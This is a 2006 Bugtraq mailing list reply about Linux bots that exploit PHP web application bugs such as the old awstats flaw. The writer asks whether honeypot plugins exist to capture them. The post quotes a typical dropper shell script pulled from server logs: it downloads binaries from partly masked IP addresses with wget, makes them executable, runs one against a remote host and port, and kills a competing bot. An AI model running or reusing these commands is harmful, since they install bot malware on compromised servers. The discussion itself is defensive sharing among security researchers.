Bugtraq mailing list archives
Re: new linux malware
From: "Jamie Riden" <jamie.riden () gmail com>
Date: Thu, 23 Feb 2006 09:00:13 +1300
On 21/02/06, Gadi Evron <ge () linuxbox org> wrote:
Indeed, it has become an annoying trend everybody talks about but nobody writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either vulnerabilities in know applications such as WordPress, PHPBB, Drupal, etc. or actually trying different permutations to attack the site.
<snip>
Anyone else seeing their web server logs going crazy with new patterns every day? Email me, I am starting a sharing system where these can be shared mutually so we can better protect ourselves, create signatures, etc.
I got as far as looking at mwcollect and nepenthes to see if anyone had written plugins to slurp these bots, but couldn't find anything. Typically they're some sort of variant on: #!/bin/bash cd /tmp wget xxx.yy.105.36/ping mv ping cb chmod +x cb ./cb xxx.yyy.233.251 8080 & killall -9 lordnikonz wget xxxx052101/images/logo.jpg mv logo.jpg httpd rm -rf scripz chmod +x httpd export PATH="." httpd with payloads being variously identified as Kaiten, Linux.RST and Lupii by Symantec AV. This is just stuff trying the old awstats exploit, I haven't coded up any handlers for the xml-rpc, or other exploits. So - any handlers/plugins for these? And if so, is anyone (respectable :) collecting the malware? cheers, Jamie
Current thread:
- new linux malware Gadi Evron (Feb 20)
- Re: new linux malware Christine Kronberg (Feb 21)
- PHP as a secure language? PHP worms? [was: Re: new linux malware] Gadi Evron (Feb 22)
- Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Christine Kronberg (Feb 21)
- Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Thomas M. Payerle (Feb 26)
- Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Kevin Waterson (Feb 24)
- Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jamie Riden (Feb 26)
- Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Matthew Schiros (Feb 26)
- PHP as a secure language? PHP worms? [was: Re: new linux malware] Gadi Evron (Feb 22)
- Re: new linux malware Christine Kronberg (Feb 21)
- Re: new linux malware Gadi Evron (Feb 22)
- Re: new linux malware Jamie Riden (Feb 23)